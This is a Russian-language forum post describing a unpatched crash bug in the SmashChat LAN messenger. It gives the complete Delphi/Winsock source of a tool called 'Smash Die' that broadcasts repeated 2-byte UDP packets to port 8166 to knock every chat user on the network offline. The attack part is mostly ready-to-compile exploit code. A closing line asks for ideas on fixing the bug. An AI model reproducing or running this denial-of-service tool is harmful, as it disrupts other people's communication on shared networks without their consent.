В нашей сети все пользуются SmashChat для общения, передачу файлов через сеть и др. функциями. Скачать можете тут этот чат: _http://xfen.narod.ru/smashchat/SmashChat1.0.3.845.rar И вот недавно стали часто местные "любители хака" кикать с чата, банить людей... Я зажегся идеей тоже найти баги и попробывать написать программку Smash Die (название соответсвует назначению проги ) Передача данных в чате осуществляется через 8166 UDP порт. Оказуется что, если отправить получателю 2 байта, то вылетает ошибка (этот баг еще в настоящий момент не исправлен автором). Но 1 ошибка тока заграмаждает ОЗУ, но если отправить 250 раз, то получатель, он же жертва, проста-напроста вылетает из чата.Скомпилированную прогу не стал выкладывать,так как кто знает и кому нада, тот поймет, исходный код (с использованием winsock) на Delphi вот: HTML: unit Unit1; interface uses Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms, Dialogs, StdCtrls,winsock; type TForm1 = class(TForm) Button1: TButton; Memo1: TMemo; procedure Button1Click(Sender: TObject); private { Private declarations } public { Public declarations } end; const port=8166; var Form1: TForm1; Init: TWSAData; SockOpt: BOOL; Sock: TSocket; hd: TSockAddrIn; Data:string; Databytes:byte; implementation {$R *.dfm} procedure TForm1.Button1Click(Sender: TObject); var i:integer; begin for i:=1 to 235 do begin Databytes:=2; WSAStartup($101,Init); Sock:=Socket(PF_INET,SOCK_DGRAM,IPPROTO_UDP); SockOpt:=TRUE; SetSockOpt(Sock,SOL_SOCKET,SO_BROADCAST,Pchar(@SockOpt),SizeOf(SockOpt)); hd.sin_port:=htons(port); hd.sin_addr.S_addr:=INADDR_BROADCAST; hd.sa_family:=AF_INET; SendTo(Sock,Data,DataBytes,0,hd,SizeOf(hd)); WSACleanup; end; end; end. И тут же: у кого есть какие предложения, мысли для написания проги - ликвидации этого бага...